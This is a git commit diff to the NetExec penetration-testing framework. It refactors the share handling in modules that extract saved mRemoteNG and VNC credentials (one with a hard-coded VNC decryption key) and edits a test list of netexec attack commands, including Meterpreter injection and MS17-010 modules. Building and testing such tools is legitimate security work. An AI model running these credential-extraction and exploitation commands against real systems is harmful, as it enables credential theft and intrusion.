multiple fixes

zblurx · zblurx · commit dba83a43f9b8 · 2024-05-21T20:29:42.000+02:00
diff --git a/nxc/modules/mremoteng.py b/nxc/modules/mremoteng.py
@@ -58,10 +58,6 @@ def options(self, context, module_options):
         """
         self.context = context
         
-        self.share = "C$"
-        if "SHARE" in module_options:
-            self.share = module_options["SHARE"]
-
         self.password = "mR3m"
         if "PASSWORD" in module_options:
             self.password = module_options["PASSWORD"]
@@ -74,8 +70,9 @@ def on_admin_login(self, context, connection):
         # 1. Evole conn into dploot conn
         self.context = context
         self.connection = connection
+        self.share = connection.args.share
 
-        host = connection.hostname + "." + connection.domain
+        host =  f"{connection.hostname}.{connection.domain}"
         domain = connection.domain
         username = connection.username
         kerberos = connection.kerberos
@@ -114,10 +111,9 @@ def on_admin_login(self, context, connection):
             for path in self.custom_user_path:
                 user_path = path.format(username=user)
                 self.dig_confCons_in_files(conn=dploot_conn, directory_path=user_path, recurse_level=0, recurse_max=self.recurse_max)
-            if self.custom_path is not None:
-                content = dploot_conn.readFile(self.share, self.custom_path)
-                if content is None:
-                    continue
+        if self.custom_path is not None:
+            content = dploot_conn.readFile(self.share, self.custom_path)
+            if content is not None:
                 self.context.log.info(f"Found confCons.xml file: {self.custom_path}")
                 self.handle_confCons_file(content)
 
@@ -159,7 +155,7 @@ def handle_confCons_file(self, file_content):
             username = node_attribute["Username"]
             protocol = node_attribute["Protocol"]
             port = node_attribute["Port"]
-            host = f" {protocol}://{hostname}:{port}" if node_attribute["Hostname"] != "" else "" 
+            host = f" {protocol}://{hostname}:{port}" if node_attribute["Hostname"] != "" else " " 
             self.context.log.highlight(f"{name}:{host} - {domain}\\{username}:{password}")
 
     def parse_xml_nodes(self, main):
diff --git a/nxc/modules/vnc.py b/nxc/modules/vnc.py
@@ -30,7 +30,6 @@ def __init__(self, context=None, module_options=None):
         self.context = context
         self.module_options = module_options
         self.vnc_decryption_key = b"\xe8\x4a\xd6\x60\xc4\x72\x1a\xe0"
-        self.share = "C$"
         self.false_positive = (
             ".",
             "..",
@@ -50,6 +49,7 @@ def options(self, context, module_options):
     def on_admin_login(self, context, connection):
         self.context = context
         self.connection = connection
+        self.share = self.connection.args.share
 
         host = connection.hostname + "." + connection.domain
         domain = connection.domain
diff --git a/tests/e2e_commands.txt b/tests/e2e_commands.txt
@@ -99,10 +99,8 @@ netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M masky --
 # You must replace this with the proper CA information!
 #netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M masky -o CA="host.domain.tld\domain-host-CA"
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M met_inject --options
-netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
-netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M mobaxterm --options
+netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4443 RAND=12345
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M mobaxterm
-netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M mremoteng --options
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M mremoteng
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M ms17-010 --options
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M ms17-010
@@ -154,7 +152,6 @@ netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M uac --op
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M uac
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M veeam --options
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M veeam
-netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M vnc --options
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M vnc
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M vnc -o NO_REMOTEOPS=True
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M wdigest --options
